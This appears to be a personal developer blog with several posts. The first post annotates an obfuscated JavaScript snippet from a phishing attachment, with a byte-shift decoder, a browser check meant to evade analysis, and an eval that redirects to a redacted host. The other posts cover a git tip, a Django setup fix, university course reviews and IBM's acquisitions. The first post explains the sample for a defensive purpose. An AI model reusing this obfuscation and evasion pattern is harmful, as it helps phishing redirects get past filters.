Malicious JavaScript snippet

I got this snippet in an html file attached to a phishing email.

d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i<a.length;i++){a[i]-=2;}
try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}
if(!zz)eval(String.fromCharCode.apply(String,a));

I’ve reformatted and annotated it for readability.

// hide redirect as ascii bytes
a = [0x78,0x63,0x74,0x33, etc...];

// "decrypt" our malicious code
// maybe this is good enough to defeat filters looking for encoded redirects?
for (i = 0; i < a.length; i++) {
    a[i] -= 2;
}

//detect if we're in a real browser
try {
	//throws exception because you can't increment a node
    document.body++
} catch(e) {
    // running in a real browser
    notInBrowser = 0;
}

try {
    //this throws an exception if we didn't throw an exception above
    //(notInBrowser will be undefined)
    notInBrowser &= 2
}
catch(e) {
    notInBrowser = 1;
}
// if we are in a browser, do the redirect
// remember 0 == false and 1 == true 
if (!notInBrowser) {
    eval(String.fromCharCode.apply(String,a));
}

The decrypted code fed to the eval:

var1=49;
var2=var1;
if(var1==var2) {document.location="http://[redacted]:8080/forum/links/column.php";}

I’m not sure what was at the url. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.

This guy has a similar post that explains the document.body++.
http://jeffreysambells.com/2012/12/12/anatomy-of-a-hack

Exclude a file from a git commit

I need to do this about once a week.

git update-index --assume-unchanged path/to/file.txt

git commit -a -m "MOBILE-1234: changed a bunch of files but excluded that one I'm saving for later."

git update-index --no-assume-unchanged path/to/file.txt

If you change 10 files but you only want to commit 9 this will do the trick.

TODO: Complete this git tutorial that blew up on HN a while back. http://pcottle.github.com/learnGitBranching/

Run Django from IntelliJ IDEA on OSX with MySQL

If you try to run a Django app from within Intellij using MySQL as the storage backend, you might get the following error.

django.core.exceptions.ImproperlyConfigured: Error loading MySQLdb module: dlopen(/Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so, 2): Library not loaded: libmysqlclient.18.dylib Referenced from: /Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so
 Reason: image not found

You’re missing the DYLD_LIBRARY_PATH environment variable.
In Intellij, go to “edit configurations”, and add this:
DYLD_LIBRARY_PATH=/usr/local/mysql/lib/

Major: Computer Engineering

I recently received a degree in Computer Engineering from the University of Texas. It was a long time coming.

Here’s a rundown of every course I took at UT. This may be helpful if you’re considering attending UT or trying to pick your major.

E E 306 INTRODUCTION TO COMPUTING
302 and 306 are the very first courses designed to get you interested in either electrical or computer engineering. This course confirmed what I already knew: I like computers. The curriculum employs a bottom-up approach designed to take away the magic of computing. If you’re lucky, you’ll get the venerable Yale Patt.

E E 302 INTRO ELECTRICAL ENGINEERING
306’s dual course is a light introduction to circuits. You’ll learn KVL loops and Thevenin equivalences. In a perfect world this would be the only required EE course for CE majors.

M 408D SEQ, SERIES, AND MULTIVAR CALC
Multivariable calculus is a solid math course. I’m generally pretty bad at mathematics, but I appreciated this one. It picks up where AP BC calculus left off.

C C 304C INTRO TO THE NEW TESTAMENT
I’m thankful my family never forced me to go to church, but I did miss out on some culturally important narratives and biblical themes. You’d be surprised at how many little turns of phrase come from Jesus quotes. The course was worthwhile.

M 427K ADV CALCULUS FOR APPLICATNS I
So differential equations are the foundation for several types of engineering. I appreciate the idea, but I had a hell of a time grokking them. The math department has some terrible teachers. Use MyEdu before taking a lower division math course.

PHY 103N LABORATORY FOR PHY 303L
This lab course is attached to PHY 303L. It’s an exercise in tedium and divining meaning from unclear an unclear instruction manual. The lab TA was a dick until the last day when he handed out the course evaluations. Nobody was fooled.

E E 312 INTRODUCTION TO PROGRAMMING
This course gets you started with C and a little tiny bit of C++ in the last week or so. There’s a good amount of pointer tricks and doing clever tricks with the stack. It’s stuff you wouldn’t normally do, but it’s good for demonstrating an understanding of the mechanics of activation records. Remember that scene from The Matrix Reloaded where Smith creates a bunch of clones of himself? The professor played that clip to explain recursion. “Neo is the base case,” he said.

PHY 303L ENGINEERING PHYSICS II
The single biggest mistake I made in my academic career was not testing out of this course with the Electricity and Magnetism AP test. The physics professors are notoriously bad teachers. If you take it upon yourself to learn physics on your own in high school, you will likely be better off.

E E 411 CIRCUIT THEORY
The professor for this course flew in from California every Monday and Wednesday to teach it. Most lectures were accompanied by a story about Bob Widlar‘s drunken antics. This course is probably unnecessary for Software Engineers.

E E 316 DIGITAL LOGIC DESIGN
Logic Design is an important course. It’s a light introduction to things like muxes, adders, and VHDL. I would recommend it for software engineers because it forces you to think about playing with bits in clever ways.

E E 322C DATA STRUCTURES
This course is tied for first place with Algorithms. Students call it “Java”, but it’s much more. You’ll implement linked lists, hash tables, and all kinds of trees.

M 325K DISCRETE MATHEMATICS
This is the one math course I actually enjoyed. The teacher was a lecturer, not a professor of any sort. But she was possibly the best teacher I had at UT. The course is full of proofs, but they’re totally manageable. For any question they throw at you, you’ll only have a few tools in your toolbox so you won’t get stuck for long.

E E 319K INTRO TO EMBEDDED SYSTEMS
This course is definitely the most fun. You basically hack away on microcontrollers. The lab section is a series of miniprojects that you show off to a lab TA. When I took it they were using the Freescale 9s12DP512, but they’ve since switched to an ARM architecture of some sort.

E E 333T ENGINEERING COMMUNICATION-W
This course involves several papers and a powerpoint presentation. You’ll learn that many people are terrible writers and even worse speakers. This course is for them. It should be an easy A, but the groups are paired randomly, so you’ll have to have some team cohesion. And that’s probably part of the lesson.

E E 313 LINEAR SYSTEMS AND SIGNALS
You could call this course “Applied differential equations”. Not my cup of tea. But if you like analog stuff this may be for you. Dr. Hall owns an audio company and demos the tech at some point.

E E 438 ELECTRONIC CIRCUITS I
This is the only course I didn’t finish. Halfway through the semester the ECE department released a new course catalog with a more specialized track for Computer Engineers. I used a Q-drop (penalty-free mechanism for quitting), but not before completing most of the circuit design labs.

E E 360C ALGORITHMS
This is the big papa of software courses. Learn them, love them.

E E 351K PROBABILITY & RANDOM PROCESSES
This is known as one of the more a difficult courses in the curriculum, but it definitely should be in the curriculum. Part of the issue for my class was that the professor (Vikalo) was teaching it for the first time and he was a master of the subject. The best math professors can teach it to you like you’re five. That said, I’ll probably end up using some of the Bayesian stuff eventually.

M 340L MATRICES AND MATRIX CALCULATNS
Dr. Arlo Schurle is likely the best math professor at UT and he makes Linear Algebra a cakewalk.

ARH 339M AMERICAN ART SINCE 1960
This is a good course if you like art or think you might like art, but I wouldn’t want to make it my major. Be prepared to memorize the year, artist, and media for about 250-300 works of art.

UGS 302 CIV SOCTY IN POSTCOLONL STATES
This one was a gem. The course examined the influence of Tocquevillian associations in the Middle East and North Africa. The best part: I took it the semester before the Arab Spring. Nobody saw it coming.

E E 445L MICROPROCESSOR APPLICS AND ORG
This top-tier course picks up where 319k left off with more advanced mini-projects on the 9s12. For the final project, you design a PCB and get it fabricated. My project was a handheld pong console. I’ll never forget debugging the system with a multimeter and finding a dead wire in the middle of that fucking ribbon cable. These two microcontroller courses are almost completely architected by Valvano.

E E 364D INTRO TO ENGINEERING DESIGN
364D constitutes part one of “senior design”. You form your group and select your project from a list of projects provided by industry sponsors. This stage is all about process and planning. You write a series of very similar papers and design plans, but don’t really build anything. The single most important lesson from this class is that you should only take on group members that you trust 100%. If you’re on the fence about somebody, just say no. That temporary pain you feel from rejecting someone is well worth the year of agony brought on by an incompetent team member.

M 348 SCI COMPUTATION IN NUM ANLY
This course was such a letdown. I had hoped to learn MATLAB or R, but instead we implemented numerical methods in C++. Even worse, the programming component was actually very small. The vast majority of the time was spent working traditional math problems. But, it is kind of cool to learn the algorithms used by your graphing calculator.

E E 372N TELECOMMUNICATION NETWORKS
The professor, Scott Nettles, is a good teacher and a chill dude. He takes you through the basics of networking from bits on a wire up through BGP and IPv6. The course is a mixed undergraduate/graduate course, but undergrads are spared from the x-kernel labs.

E E 155 ELECTRICAL/COMPUTER ENGR SMNR
I needed an extra hour to get the requisite number of hours required by the 2010-2012 catalogue. This seminar features a new guest speaker faculty member from the ECE department every week. Professors spoke about their research into metamaterials, automatic program transformations, medical devices, and autonomous vehicles to name a few.

GOV 312L AMERICAN GOVERNMENT (Credit by Exam)
I avoided government entirely at UT by claiming AP test credit and taking US government from ACC online. I did this because I wanted to have more time to focus on my other technical courses. I regret it a little bit. My roommate fulfilled 312L with a course on Mexican government that sounded extremely interesting.

E E 360F INTRO TO SOFTWARE ENGINEERING
Nearly everyone blows off this course which is a huge shame. They will pay for it later. The textbook is Mythical Man Month, and there are a variety of papers assigned as reading. The content itself is reasonably interesting, but Perry manages to suck the life out of it in lecture.

E E 464K SENIOR DESIGN PROJECT
The second semester of senior design is more substantial in that you actually build the product. But for the most part, it’s more of the same: long hours spent editing papers with five authors. The key to success here is real time collaborative editing using Google Docs while talking over Skype.

R M 357E INTRO TO RISK MANAGEMENT
I took a rare chance to get a formal background in finance. This course covers many different types of insurance, something that most people never get any exposure to. The professor I had, Patricia Arnold, takes attendance (?!), but is seriously passionate about insurance which helps drive lectures about a traditionally dry subject matter.

E S 377 INTERDISCIPLNRY ENTREPRENRSHP
1 Semester Startup is positioned to be the killer app for UT. I was fortunate enough to get DebateTab into the very first class. Josh Baer and Bob Metcalfe are solid resources who really want to help. If you take this class. the limiting agent will be yourself and your team’s commitment to school. It’s hard to convince someone to hack when he’s struggling with a math course. You also can’t be upset when your cofounders who are in the country on student visas get hired by Microsoft and Salesforce.

E E 360T SOFTWARE TESTING
This class is important, but it won’t make you a great test writer. The goal is to cover as many types of testing as possible from the Ammann & Offutt text. It begins with JUnit basics and proceeds to survey graph coverage, logic coverage, input space partitioning, and syntax-based testing. The homework assignments with the JPF model checker were some of the strangest, but most interesting assignments I’ve had.

E E 461L SOFTWARE ENGR AND DESIGN
This is the new software lab that’s supposed to prepare you for the real world with JUnit, bash, svn, ant, UML diagrams, and Hoare logic. The course falls short because it’s disorganized and no substitute for teaching yourself. But, it’s better than nothing if you’ve never used anything listed in the previous sentence.

E E 360P CONCURRENT AND DISTRIBUTED SYS
This is where Vijay Garg really shines. His teaching style involves setting up a problem, asking students to solve it, and then pulling them forward through the history of solutions. The key here is that he doesn’t linger so long that you lose focus. After taking this course you will be a much better programmer. Concurrency is one of those topics that you just don’t pick up from “Learn PHP in 24 hours”.

A week before graduation I learned that I would be awarded a double major (in electrical engineering) which was surprising because I intended to only major in computer engineering. Apparently you can’t major solely in CE.

Courses I should have taken

If I had an extra year I would definitely take the following courses. I probably could have found space for them if I’d planned better or worked harder, but hindsight’s 20/20.

E E 460N COMPUTER ARCHITECTURE
This is considered the most difficult and the most time consuming course in ECE. But it may be the most instructive of all. Chiou, who teaches it, says:

Prof. Patt, who is one of the world’s leading computer architects, designed the class.  It covers about 80% of what I studied in a graduate computer architecture classes at MIT (6.823.)

The quote says a lot because all the descriptions of MIT coursework I’ve read make it sound twice as rigorous as anything I took at UT. The problem sets from 2011 are available on Patt’s site.

EE445M EMBEDDED AND REAL TIME SYSTEMS LAB
445M is the most involved embedded systems course you can take as an undergraduate, mainly because you write your own operating system. From the course description:  implementation of multitasking, synchronization, protection, and paging; operating systems

E E 125S INTERNSHIP IN ELEC & COMP ENGR
You can claim one hour of credit for having an internship related to your major. My two years at IBM would have qualified, but I was too lazy to get the paperwork signed. It would have been a hassle because my manager was in Raleigh.

A smarter or more motivated person could easily finish this program in less than 4 years. I don’t regret taking my time, though. College is worth savoring, especially at UT.

Why not CS?

I avoided Computer Science because most of the descriptions I read made the discipline sound heavy on math and theory, and lighter on actual hacking. Formal proofs are difficult and boring for me, so I chose engineering. In retrospect, I’m not sure that this was the right choice because there’s a good amount of freedom within a degree plan.

If you major in computer engineering, you’ll constantly be referred to as a CS or EE major. I found this to be irksome because I made a conscious choice to get an engineering degree, but I also don’t care for circuits. But you can’t really let this get to you because the degrees are functionally equivalent in the workplace. This is justified because neither department is stupid. The CS department is well aware that you need to learn some assembly and logic design and the ECE department ensures that you know how to analyze big-O complexity of an algorithm. You’ll be in good shape either way. And if you know that you just want to build webapps, you might consider CS because you’ll have a better chance of meeting web hackers. I can count the number I met in ECE on two hands.

Aftermath

During my senior year I interviewed at four software companies and received four job offers. I started work at Indeed in June. If you want one of the more engaging programming jobs, you can’t just write code for class. You can either A) be really really smart, or B) be someone who spends a lot of time building cool stuff. Go to Hacker Lounge to meet people who are both.

How to get your startup acquired by IBM

IBM as we know it now has been absorbing other companies since the early 1900s. The first IBM-related acquisition happened in 1899 when IBM precursor Bundy Manufacturing bought a company that made time clocks. As a reference point, that sale happened 34 years after the end of the Civil War. Since then, Big Blue has acquired a staggering amount of firms, including 47 since 2008[1].

So if you’re looking for an exit, it wouldn’t hurt to see what kind of firms big enterprises are interested in. So how can we characterize those 47 acquisitions made from 2008 to today?

Virtually all of them are software companies

This isn’t surprising. By now, most people are familiar with IBM’s reinvention as a software and services company. Tom Friedman devotes a few paragraphs to the metamorphosis in The World is Flat. Making the World Work Better, the IBM book given to every employee, belabors the point.

Literally all of them have B2B business models.

Business!

“A million people walk into a bar in Silicon Valley. Nobody buys anything. The bar is declared a huge success.”

Again, enterprise software and services are IBM’s bread and butter. While people joke about the valley celebrating SoLoMo companies that don’t make any money, enterprise software firms have been laughing all the way to the bank.

Anecdotally, I’ve noticed that some IBM products aren’t really the best available or the most user friendly. Anyone who’s used NetInsight or Lotus Notes can attest to that. Perhaps this is just a symptom of enterprise software in general: You don’t have to have the best product, you just need to convince a bunch of companies they need you. The enterprise market is ostensibly ridden with friction and inefficiency. After the sale is made, the product just has to do what it says on the box halfway decently. It doesn’t really matter if it’s slow and unintuitive. I’d really like to see UX lessons learned from bubblegum web startups osmose into the b2b domain [2].

The average age at acquisition is 13.5 years

IBM buys established, profitable companies that have a lot of traction. These companies don’t look like they were “built to flip”. There is a very real, proven demand for the products or services.

60% are from the US. Of those 29, 8 are from Massachusetts and 8 are from Silicon Valley.

It’s not surprising that Silicon Valley is well represented, but the Bay Area hardly has a monopoly. Only 17% of all companies acquired since 2008 were from the Valley.

Massachusetts is home to MIT, Harvard and about 100 smaller schools. And local VC’s have a reputation for funding companies selling to big business.

Of the “rest of the world” group, Israel is well represented. Haifa is known as a tech engine and IBM has a large research presence at the University of Haifa.

In the next 20 years expect to see acquisitions from BRIC nations. India and China are producing very high numbers of engineering students with graduate degrees. The oft repeated argument that “they aren’t as innovative as us” is going to look pretty silly by 2030. The biggest reason we haven’t seen any BRIC acquisitions so far is because of the long incubation time mentioned above. Many of the companies in emerging markets that IBM will acquire have likely already been founded.

This post wouldn’t be complete without mentioning Austin. Since 2008 IBM’s only Austin acquisition was the 2009 purchase of Lombardi Software. Former Lombardi CEO Rod Favaron is now at Spredfast, a company worth mentioning because a) they do social for enterprise and b) they gave me a T-shirt. Note that both companies came out of ATI, a UT partnership with the private sector.

And long before Lombardi there was the huge Tivoli merger in 1996. If you have the opportunity to see Frank Moss (former Tivoli CEO) speak, you should take it. He’s an interesting dude. And, strangely enough, he began his career working for IBM Research in Haifa.

The Bottom Line

IBM likes to acquire established enterprise software firms that have been in business for over a decade. Their cities of origin are geographically diverse, but many are characterized by high availability of venture capital and a strong history of academic interaction with the private sector.

You may be able to glean some insight of your own from the Google Doc spreadsheet with all the data:

P.S.:
Cringely just wrapped up a series of posts announcing the imminent downfall of IBM, due in part to its inability to deliver on service agreements. I expect software revenue will continue to grow and mitigate failures of global services. Cringely is pessimistic about all the software buys and doesn’t believe that IBM can turn new software products into billion dollar business. I disagree. The companies that IBM bought were profitable. There are enough smart people [3] at IBM to figure out how to assemble halfway decent software products into coherent packages that can be sold by a proven sales force.

Update 3/23/2013: @miquelcamps has done some analysis of Crunchbase acquisition data. IBM is listed as the 4th largest acquirer behind Cisco, Microsoft, and Google.

[1] Most of data in this post comes from Crunchbase and Wikipedia.
[2] Mixpanel appears to be doing this. And Palantir claims to bring Silicon Valley level software to government.
[3] I just wrapped up a 2 year internship in IBM’s developerWorks.